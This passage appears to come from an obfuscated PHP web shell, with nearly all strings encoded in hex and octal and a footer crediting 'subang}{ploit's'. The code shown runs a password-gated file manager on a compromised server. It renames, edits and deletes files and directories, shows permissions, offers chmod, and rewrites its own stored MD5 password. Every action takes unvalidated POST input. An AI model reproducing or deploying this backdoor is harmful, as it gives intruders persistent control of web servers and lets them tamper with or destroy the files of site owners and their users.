"\x22\x3e\xa\x20\x20\40\40\x20\x20\x20\x20\x3c\x69\156\160\165\x74\40\164\171\x70\145\75\x22\x68\151\x64\x64\x65\156\x22\x20\156\x61\x6d\x65\75\x22\x6f\160\x74\x22\40\166\x61\154\x75\x65\x3d\x22\x63\x68\155\157\144\x22\x3e\12\40\x20\40\x20\40\x20\40\x20\74\x69\156\x70\165\164\x20\164\x79\x70\x65\75\42\163\165\x62\x6d\x69\164\x22\x20\x76\141\x6c\x75\x65\x3d\x22\x47\157\42\x20\57\x3e\12\40\x20\x20\40\40\40\40\x20\74\57\x66\x6f\162\155\x3e"; } elseif ($_POST["\x6f\x70\164"] == "\162\145\156\x61\155\145") { if (isset($_POST["\x6e\145\167\x6e\x61\x6d\145"])) { if (rename($_POST["\x70\x61\x74\150"], $path . "\57" . $_POST["\156\x65\167\x6e\141\155\x65"])) { echo "\x3c\x66\157\156\164\x20\x63\157\x6c\157\162\x3d\42\147\x72\145\145\156\42\76\123\165\x63\x63\x65\163\x73\x3c\x2f\x66\x6f\156\164\76\74\x62\x72\40\x2f\x3e"; } else { echo "\x3c\146\x6f\156\x74\40\x63\157\154\x6f\x72\75\42\162\145\144\x22\76\106\x61\151\154\x65\x64\74\57\146\x6f\x6e\x74\x3e\74\142\x72\x20\x2f\76"; } $_POST["\x6e\x61\x6d\x65"] = $_POST["\156\x65\167\156\x61\x6d\145"]; } echo "\74\146\157\x72\x6d\x20\x6d\145\x74\x68\x6f\144\75\42\x50\x4f\123\x54\x22\76\12\x20\40\x20\40\x20\40\40\x20\x4e\145\x77\40\116\141\x6d\x65\x20\72\40\x3c\x69\x6e\x70\165\x74\x20\156\141\x6d\x65\75\x22\156\145\x77\x6e\x61\x6d\145\x22\x20\164\x79\160\x65\x3d\42\164\145\x78\x74\42\x20\163\x69\x7a\145\x3d\x22\62\60\42\x20\166\141\x6c\165\145\75\42" . $_POST["\156\x61\155\x65"] . "\42\40\x2f\x3e\12\x20\40\40\40\40\x20\40\40\74\x69\x6e\160\165\164\40\164\171\x70\x65\75\42\x68\151\144\144\145\x6e\42\x20\156\141\155\145\75\42\x70\x61\x74\x68\x22\40\166\141\x6c\x75\145\x3d\42" . $_POST["\160\141\164\x68"] . "\x22\76\12\x20\40\40\x20\x20\x20\x20\40\74\x69\156\160\x75\x74\x20\164\x79\x70\x65\75\42\x68\151\x64\x64\145\156\x22\40\156\141\155\145\x3d\42\x6f\160\164\42\40\x76\141\154\165\145\x3d\x22\162\145\156\141\155\145\x22\x3e\xa\x20\x20\40\40\40\40\x20\40\74\151\x6e\160\x75\x74\x20\x74\x79\160\x65\75\42\163\165\x62\x6d\x69\x74\42\x20\166\x61\x6c\x75\145\x3d\42\x47\157\x22\x20\x2f\76\12\x20\x20\40\x20\40\40\x20\40\74\57\x66\157\162\155\76"; } elseif ($_POST["\157\160\x74"] == "\145\144\151\x74") { if (isset($_POST["\x73\x72\x63"])) { $fp = fopen($_POST["\160\x61\164\150"], "\167"); if (fwrite($fp, $_POST["\x73\162\x63"])) { echo "\74\x66\x6f\156\164\40\143\x6f\154\x6f\x72\75\x22\x67\162\145\145\x6e\x22\x3e\x53\x75\x63\143\145\163\163\x3c\x2f\x66\157\156\164\x3e\x3c\142\162\x20\57\x3e"; } else { echo "\x3c\146\x6f\x6e\x74\x20\x63\157\x6c\x6f\x72\x3d\x22\x72\145\144\42\x3e\106\x61\151\x6c\145\x64\74\57\146\x6f\156\x74\76\74\x62\162\40\x2f\76"; } fclose($fp); } echo "\74\146\x6f\162\155\x20\x6d\145\x74\150\157\144\75\42\x50\x4f\123\x54\42\x3e\xa\x20\x20\x20\40\x20\40\40\x20\x3c\x74\145\170\164\x61\162\x65\x61\x20\143\157\154\163\75\x38\x30\40\162\x6f\x77\x73\75\x32\x30\x20\156\x61\155\x65\75\x22\163\x72\x63\x22\x3e" . htmlspecialchars(file_get_contents($_POST["\x70\141\x74\150"])) . "\x3c\x2f\x74\x65\170\164\x61\162\145\141\x3e\x3c\x62\162\x20\x2f\76\12\x20\x20\40\x20\x20\x20\40\x20\74\x69\x6e\160\x75\x74\x20\x74\x79\x70\x65\75\x22\x68\151\x64\144\145\156\x22\40\156\x61\155\x65\75\42\160\141\x74\x68\x22\x20\x76\141\154\165\x65\x3d\x22" . $_POST["\160\141\164\x68"] . "\x22\76\xa\x20\x20\x20\x20\40\x20\x20\40\74\x69\x6e\160\x75\164\x20\164\x79\160\x65\x3d\42\150\151\144\x64\145\156\42\40\156\141\x6d\145\75\42\x6f\160\x74\42\x20\166\x61\154\x75\x65\75\x22\x65\144\x69\x74\x22\x3e\xa\40\x20\x20\40\x20\x20\x20\x20\74\x69\156\160\165\164\40\164\171\x70\x65\75\x22\x73\165\x62\x6d\x69\x74\x22\x20\166\141\x6c\165\145\x3d\x22\107\x6f\x22\40\x2f\76\12\40\x20\40\x20\40\x20\x20\40\x3c\x2f\x66\157\162\155\x3e"; } echo "\74\57\143\x65\x6e\164\145\162\x3e"; } else { echo "\74\142\x72\40\57\x3e\74\143\x65\x6e\164\145\162\76"; if (isset($_GET["\157\160\164\x69\x6f\156"]) && $_POST["\157\x70\164"] == "\144\x65\x6c\145\164") { if ($_POST["\164\171\x70\145"] == "\144\x69\x72") { if (rmdir($_POST["\x70\141\x74\x68"])) { echo "\74\146\157\x6e\164\40\143\x6f\x6c\157\x72\x3d\42\147\x72\x65\x65\156\42\76\123\x75\x63\x63\145\x73\x73\x3c\x2f\x66\x6f\156\164\76\x3c\142\162\40\57\x3e"; } else { echo "\74\x66\x6f\x6e\x74\40\143\157\x6c\x6f\162\x3d\x22\162\x65\x64\42\76\106\141\151\x6c\x65\144\74\x2f\146\x6f\x6e\164\x3e\74\142\162\x20\57\x3e"; } } elseif ($_POST["\x74\171\x70\x65"] == "\x66\x69\x6c\145") { if (unlink($_POST["\160\141\x74\x68"])) { echo "\x3c\x66\x6f\156\x74\40\x63\x6f\154\x6f\x72\x3d\x22\147\x72\145\145\156\x22\x3e\123\165\143\143\x65\x73\x73\74\57\x66\157\x6e\x74\76\74\142\x72\x20\57\76"; } else { echo "\x3c\146\x6f\156\x74\40\143\157\154\x6f\162\x3d\x22\x72\145\144\42\76\106\x61\151\x6c\x65\x64\x3c\57\146\x6f\x6e\164\x3e\x3c\142\x72\40\x2f\x3e"; } } } echo "\x3c\x2f\x63\145\x6e\x74\145\162\x3e"; if (!isset($_GET["\x78"])) { $scandir = scandir($path); echo "\x3c\144\x69\x76\40\x69\144\x3d\x22\143\157\156\x74\145\156\x74\42\76\x3c\164\x61\142\154\x65\40\167\151\x64\x74\150\x3d\x22\x37\60\60\x22\40\x62\x6f\x72\x64\x65\162\75\42\x30\x22\x20\x63\x65\154\154\160\x61\144\144\x69\156\147\75\x22\x33\42\x20\x63\x65\x6c\x6c\x73\x70\x61\x63\x69\156\147\75\x22\61\x22\x20\141\154\151\x67\156\x3d\x22\x63\x65\x6e\x74\x65\162\42\76\xa\x20\40\x20\x20\74\164\162\40\143\154\141\x73\x73\x3d\42\146\x69\x72\163\164\x22\76\12\40\40\x20\x20\40\40\40\x20\x3c\x74\x64\x3e\x3c\x63\145\x6e\x74\145\x72\76\74\146\157\x6e\x74\x20\x63\157\154\x6f\162\x3d\42\162\x65\x64\42\76\104\151\162\x3c\57\x66\157\156\x74\76\74\57\143\x65\156\x74\x65\x72\x3e\x3c\x2f\164\144\76\xa\40\40\x20\x20\x20\40\x20\x20\x3c\x74\x64\x3e\74\x63\x65\x6e\164\x65\162\x3e\74\146\157\x6e\164\x20\x63\157\154\x6f\x72\x3d\x22\x72\x65\144\x22\76\123\x69\x7a\x65\x3c\x2f\x66\x6f\x6e\x74\x3e\74\57\143\x65\x6e\x74\145\x72\76\x3c\x2f\x74\144\x3e\xa\x20\40\40\x20\x20\40\x20\40\x3c\x74\144\x3e\74\x63\145\x6e\x74\x65\162\76\x3c\x66\157\156\164\40\x63\x6f\x6c\x6f\x72\75\x22\162\x65\x64\x22\76\x50\145\x72\x6d\x69\163\x73\x69\x6f\156\x73\x3c\x2f\146\157\x6e\x74\76\x3c\57\x63\145\156\164\145\x72\x3e\x3c\x2f\x74\x64\x3e\12\x20\x20\40\40\40\x20\x20\x20\74\164\144\x3e\x3c\x63\x65\x6e\164\145\162\76\x3c\x66\157\156\164\x20\x63\x6f\x6c\157\162\75\x22\162\x65\x64\x22\x3e\x53\x65\164\x74\x69\x6e\x67\x3c\x2f\146\x6f\156\164\x3e\x3c\57\x63\x65\x6e\x74\x65\x72\76\74\x2f\x74\x64\x3e\xa\x20\40\40\x20\x3c\57\x74\162\76"; foreach ($scandir as $dir) { if (!is_dir("{$path}\57{$dir}") || $dir == "\56" || $dir == "\56\x2e") { continue; } $dirlink = "{$path}\x2f{$dir}"; echo "\74\x74\162\x3e\12\40\x20\x20\40\40\x20\x20\40\x3c\x74\x64\76\x3c\x61\40\150\162\145\146\75\x22\77\x70\141\x74\x68\x3d{$dirlink}\x22\76{$dir}\x3c\x2f\x61\76\74\57\x74\144\76\12\x20\40\40\40\40\40\40\40\74\x74\144\x3e\74\143\145\x6e\164\145\162\x3e\x2d\55\x3c\x2f\x63\x65\x6e\164\x65\162\76\74\57\x74\144\x3e\12\40\40\40\40\x20\x20\40\40\x3c\164\144\76\74\x63\x65\x6e\x74\145\162\x3e"; if (is_writable("{$path}\57{$dir}")) { echo "\x3c\146\x6f\x6e\164\40\143\157\154\x6f\162\x3d\42\x67\x72\145\x65\x6e\42\76"; } elseif (!is_readable("{$path}\x2f{$dir}")) { echo "\x3c\x66\x6f\156\x74\40\143\x6f\154\x6f\x72\x3d\x22\x72\145\144\x22\76"; } echo perms("{$path}\57{$dir}"); if (is_writable("{$path}\57{$dir}") || !is_readable("{$path}\x2f{$dir}")) { echo "\74\57\146\x6f\x6e\x74\x3e"; } echo "\x3c\57\x63\x65\156\x74\145\162\76\x3c\57\x74\144\x3e\xa\x20\x20\x20\40\x20\x20\40\40\74\164\144\x3e\74\x63\x65\x6e\164\145\x72\76\74\146\157\x72\155\40\x6d\145\164\150\157\144\x3d\42\x50\x4f\123\124\x22\40\x61\x63\x74\x69\x6f\x6e\x3d\x22\77\157\x70\x74\x69\x6f\x6e\46\x70\x61\164\x68\75{$pathen}\42\76\xa\x20\40\x20\x20\40\x20\40\x20\74\163\145\154\145\143\164\x20\156\x61\x6d\x65\75\42\157\x70\x74\42\76\12\x9\40\x20\x20\40\74\x6f\x70\164\151\x6f\x6e\x20\166\141\x6c\x75\145\x3d\42\42\76\123\x65\x6c\x65\x63\x74\x3c\x2f\157\x70\x74\151\x6f\156\x3e\12\x20\40\x20\40\x20\x20\40\40\74\x6f\x70\x74\x69\x6f\x6e\40\166\x61\x6c\x75\x65\75\x22\144\145\x6c\x65\x74\42\76\104\x65\x6c\x65\164\x65\x3c\57\157\x70\164\151\x6f\x6e\x3e\12\40\x20\x20\x20\40\x20\40\x20\x3c\x6f\x70\164\151\x6f\156\40\x76\141\x6c\165\145\x3d\x22\143\150\155\x6f\144\42\76\x43\x68\155\157\144\74\57\x6f\x70\164\x69\x6f\156\76\12\40\x20\x20\40\40\x20\x20\40\74\x6f\x70\x74\151\157\x6e\40\x76\141\154\165\145\x3d\x22\x72\x65\x6e\x61\155\x65\42\76\x52\145\156\x61\x6d\x65\74\57\157\160\x74\151\x6f\156\76\12\40\40\40\x20\40\x20\x20\40\74\x2f\163\145\154\145\143\164\76\12\40\40\x20\x20\40\x20\x20\x20\74\151\156\x70\165\x74\x20\164\x79\160\x65\75\x22\150\151\144\144\145\x6e\42\40\156\x61\155\145\x3d\x22\x74\171\x70\x65\42\x20\x76\x61\154\165\x65\75\x22\144\151\162\x22\x3e\xa\40\x20\x20\40\40\40\40\40\74\x69\156\160\x75\164\40\164\x79\160\145\75\x22\150\151\x64\x64\145\156\42\x20\156\x61\x6d\x65\75\x22\156\x61\155\x65\42\40\x76\x61\154\165\x65\75\42{$dir}\x22\x3e\xa\x20\40\40\x20\x20\x20\x20\40\x3c\151\156\x70\x75\x74\40\164\171\160\145\75\42\150\151\144\144\x65\156\42\40\x6e\141\x6d\x65\75\42\160\x61\164\x68\42\x20\166\x61\154\x75\x65\75\42{$path}\x2f{$dir}\42\x3e\12\x20\40\40\x20\x20\x20\x20\40\x3c\151\156\160\x75\x74\x20\x74\x79\x70\x65\75\42\163\165\x62\x6d\x69\x74\x22\40\x76\141\x6c\165\x65\x3d\42\76\x22\x20\x2f\76\12\40\40\40\40\x20\x20\40\x20\x3c\57\146\x6f\162\155\76\74\x2f\143\145\x6e\x74\145\x72\76\x3c\57\164\144\x3e\xa\x20\40\40\x20\40\x20\x20\40\x3c\x2f\164\162\x3e"; } echo "\74\164\162\x20\143\x6c\141\x73\163\x3d\42\146\x69\162\x73\164\x22\76\x3c\164\x64\x3e\x3c\x2f\x74\x64\76\74\164\144\x3e\74\x2f\x74\x64\76\74\164\144\76\74\x2f\x74\144\76\74\x74\144\x3e\x3c\57\164\144\x3e\x3c\57\164\162\76"; foreach ($scandir as $file) { if (!is_file("{$path}\x2f{$file}")) { continue; } $size = filesize("{$path}\57{$file}") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . "\x20\115\102"; } else { $size = $size . "\40\113\102"; } $filelink = "{$path}\57{$file}"; echo "\74\164\162\76\12\x20\x20\x20\40\x20\40\40\x20\x3c\164\x64\76\74\141\40\150\162\x65\x66\x3d\42\77\146\151\154\x65\163\x72\x63\x3d{$filelink}\46\x70\141\x74\150\75{$pathen}\42\76{$file}\74\x2f\x61\76\x3c\57\x74\x64\76\xa\x20\40\x20\x20\40\40\x20\40\74\x74\144\x3e\x3c\143\x65\156\x74\x65\162\76" . $size . "\74\x2f\143\x65\156\164\x65\162\76\x3c\x2f\x74\144\x3e\xa\x20\x20\x20\x20\x20\40\40\40\74\164\144\x3e\74\x63\x65\x6e\164\145\162\x3e"; if (is_writable("{$path}\57{$file}")) { echo "\74\x66\157\x6e\x74\x20\x63\157\154\x6f\162\x3d\42\147\162\145\x65\x6e\x22\76"; } elseif (!is_readable("{$path}\57{$file}")) { echo "\x3c\146\157\x6e\x74\40\143\x6f\154\x6f\162\x3d\x22\162\145\x64\x22\76"; } echo perms("{$path}\x2f{$file}"); if (is_writable("{$path}\57{$file}") || !is_readable("{$path}\x2f{$file}")) { echo "\x3c\x2f\146\157\156\x74\76"; } echo "\74\57\143\x65\x6e\164\x65\162\76\x3c\57\164\x64\x3e\xa\40\40\x20\40\40\x20\x20\x20\x3c\x74\x64\76\74\x63\x65\156\x74\x65\162\76\x3c\146\157\x72\155\40\x6d\145\164\x68\157\x64\x3d\42\x50\117\x53\124\x22\x20\x61\143\164\151\x6f\156\75\x22\77\x6f\160\x74\151\157\156\46\x70\x61\x74\150\75{$pathen}\x22\x3e\xa\x20\40\x20\x20\40\x20\x20\x20\x3c\163\145\154\x65\x63\x74\40\x6e\141\x6d\145\75\42\x6f\x70\164\x22\76\xa\x9\40\x20\x20\x20\x3c\x6f\160\x74\151\x6f\156\x20\x76\141\x6c\165\145\75\42\42\x3e\123\x65\x6c\x65\143\164\x3c\57\x6f\x70\x74\151\x6f\156\76\xa\x20\x20\40\x20\40\40\40\x20\x3c\x6f\160\x74\151\157\x6e\40\166\x61\154\x75\x65\75\42\x64\145\x6c\145\164\42\x3e\x44\145\x6c\x65\x74\145\x3c\x2f\157\x70\164\x69\157\156\x3e\12\40\x20\40\40\40\40\40\x20\74\157\x70\164\x69\157\x6e\x20\166\x61\x6c\165\145\x3d\x22\143\150\155\x6f\144\x22\x3e\x43\x68\155\157\144\x3c\x2f\x6f\160\164\151\157\156\x3e\xa\40\40\40\x20\x20\40\x20\40\x3c\x6f\160\x74\151\x6f\156\x20\x76\x61\x6c\165\145\75\42\162\x65\x6e\141\155\145\x22\76\x52\145\156\141\155\x65\x3c\57\157\160\x74\151\x6f\156\x3e\xa\40\40\40\x20\x20\40\40\x20\x3c\x6f\x70\164\151\x6f\156\x20\x76\x61\154\165\145\x3d\42\x65\x64\151\164\x22\76\105\x64\x69\x74\x65\x20\106\151\x6c\145\x3c\x2f\157\160\x74\x69\157\x6e\x3e\12\40\x20\40\x20\x20\x20\40\x20\x3c\x2f\x73\145\154\x65\x63\x74\x3e\xa\x20\x20\40\40\40\40\40\x20\x3c\151\156\160\x75\x74\x20\x74\171\160\x65\75\42\150\151\x64\144\145\x6e\42\x20\x6e\x61\155\145\75\x22\164\171\x70\x65\x22\40\x76\141\154\x75\x65\x3d\x22\146\151\154\x65\42\76\12\40\x20\40\x20\40\40\x20\40\x3c\x69\156\x70\x75\164\x20\x74\x79\x70\x65\x3d\x22\x68\x69\x64\144\145\156\42\40\156\141\155\145\x3d\x22\x6e\141\x6d\145\42\40\166\x61\154\x75\x65\x3d\42{$file}\x22\x3e\xa\40\40\x20\40\40\x20\x20\40\74\x69\x6e\x70\x75\x74\x20\164\171\x70\145\75\x22\x68\151\144\x64\x65\156\x22\x20\x6e\x61\x6d\145\75\42\160\141\x74\x68\x22\x20\x76\141\x6c\165\145\75\42{$path}\57{$file}\x22\76\12\40\40\40\40\40\40\40\40\x3c\x69\x6e\160\165\x74\x20\x74\171\160\x65\x3d\42\163\165\142\x6d\151\164\42\x20\166\x61\x6c\x75\x65\75\42\76\x22\x20\x2f\x3e\xa\x20\x20\x20\x20\40\x20\40\x20\x3c\x2f\x66\157\x72\x6d\76\x3c\x2f\143\145\x6e\164\x65\162\76\x3c\57\x74\x64\76\xa\40\x20\x20\40\x20\x20\40\x20\74\x2f\x74\162\76"; } echo "\74\57\164\141\142\154\145\x3e\12\40\x20\x20\40\74\57\x64\151\x76\x3e"; } } if (isset($_GET["\x78"]) && $_GET["\170"] == "\x63\x68\141\156\x67\145\x70\141\163\163") { function fgc($file) { return file_get_contents($file); } function changepass($plain) { $newpass = md5($plain); $newpass = "\x24\x61\165\x74\x68\x5f\x70\x61\x73\163\40\x3d\40\42" . $newpass . "\42\73"; $con = fgc($_SERVER["\x53\103\x52\111\120\x54\137\x46\111\114\x45\116\x41\x4d\x45"]); $con = preg_replace("\x2f\x5c\44\141\x75\164\x68\137\160\x61\163\x73\134\40\52\x3d\x5c\x20\52\x5b\x22\134\x27\x5d\52\x28\x5b\x61\55\146\101\x2d\x46\x30\x2d\71\x5d\52\x29\x5b\42\134\47\x5d\52\73\57\151\x73", $newpass, $con); return file_put_contents($_SERVER["\123\103\122\111\120\124\137\x46\111\114\105\x4e\101\115\x45"], $con); } echo "\74\x63\145\x6e\164\145\162\x3e\74\x68\x31\76\x43\x68\x61\156\147\145\40\123\x68\x65\154\x6c\x20\120\x61\163\x73\167\157\x72\144\74\57\x68\x31\x3e\74\x2f\143\145\x6e\164\x65\x72\x3e"; echo "\74\x63\145\x6e\164\145\x72\76"; echo "\x3c\146\x6f\x72\155\x20\x61\143\164\151\x6f\x6e\75\x22\42\40\155\145\x74\x68\157\x64\x3d\x70\157\163\x74\40\x3e\74\164\141\142\x6c\x65\x3e"; echo "\x3c\164\162\x3e\74\x74\x64\x3e\x4e\x65\167\x20\120\x61\163\163\x77\157\x72\144\x3c\57\x74\144\76\74\x74\144\76\40\72\x20\x20\74\x69\156\160\165\164\x20\x74\x79\x70\x65\x3d\160\x61\163\x73\x77\x6f\x72\x64\x20\156\x61\x6d\145\x3d\x70\x61\x73\163\x31\40\x73\164\x79\154\x65\75\42\x62\x6f\162\x64\x65\162\55\162\x61\144\x69\165\163\x3a\x35\160\170\x3b\x22\x20\x2f\x3e\74\x2f\x74\x64\76\x3c\x2f\x74\x72\76"; echo "\74\164\162\x3e\74\164\144\x3e\x43\x6f\156\146\x69\x72\x6d\x20\x50\x61\163\x73\x77\157\x72\x64\74\x2f\x74\144\76\74\x74\144\76\40\72\x20\x20\74\151\x6e\160\165\164\40\x74\171\160\145\x3d\x70\141\163\163\x77\157\x72\144\x20\156\x61\155\145\x3d\160\141\163\163\x32\40\x73\164\x79\154\x65\75\42\142\157\162\x64\145\162\55\162\141\x64\x69\x75\x73\72\65\x70\x78\73\42\40\57\76\x3c\x2f\164\144\76\x3c\57\164\162\76"; echo "\x3c\x74\162\x3e\x3c\164\x64\x20\x63\157\154\x73\160\x61\156\x3d\62\76\74\151\156\160\x75\x74\40\x74\171\160\x65\x3d\x73\x75\142\155\x69\164\40\x76\141\x6c\165\x65\x3d\163\165\x62\155\x69\x74\x20\x6e\141\155\145\75\114\x20\163\164\171\154\x65\75\x22\142\x6f\162\x64\145\162\55\162\x61\x64\151\x75\163\x3a\x35\160\170\73\x77\x69\144\164\x68\72\61\60\60\45\42\57\x3e\74\x2f\164\x64\76\x3c\x2f\x74\x72\x3e\74\57\164\x61\x62\154\x65\x3e"; echo "\x3c\x2f\146\157\x72\155\76"; if (isset($_POST["\x4c"])) { if ($_POST["\160\141\163\163\61"] == $_POST["\x70\141\x73\163\x32"]) { if (changepass($_POST["\160\x61\x73\163\61"])) { echo "\74\163\143\162\x69\160\x74\x3e\x61\154\x65\x72\164\50\42\160\141\163\163\167\157\x72\144\40\x63\x68\x61\x6e\147\145\40\x73\165\143\143\x65\x73\x73\x66\x75\x6c\x6c\x79\42\x29\x3c\x2f\163\x63\x72\x69\x70\x74\76"; } else { echo "\74\x73\x63\x72\x69\160\164\76\x61\154\145\162\164\x28\42\160\141\x73\163\167\x6f\x72\x64\x20\143\150\x61\x6e\147\x65\40\146\141\151\154\145\x64\42\51\74\x2f\x73\143\x72\x69\x70\x74\x3e"; } } else { echo "\x3c\x73\143\x72\151\x70\164\x3e\141\154\x65\162\x74\x28\x22\160\141\x73\x73\167\x6f\x72\x64\40\x6e\x6f\x74\40\155\141\x74\143\150\42\51\x3c\57\x73\x63\x72\x69\160\x74\x3e"; } } } echo "\xa\x3c\x2f\x42\x4f\104\131\x3e\12\x3c\57\110\x54\x4d\x4c\x3e"; } else { lp(); } } else { echo lp(); } goto OozGD; OozGD: ?>
<center><br><font face="Iceland">copyright<font color="red">©</font>subang<font color="red">}{</font>ploit<font color="red">'</font>s</font><center></body></html>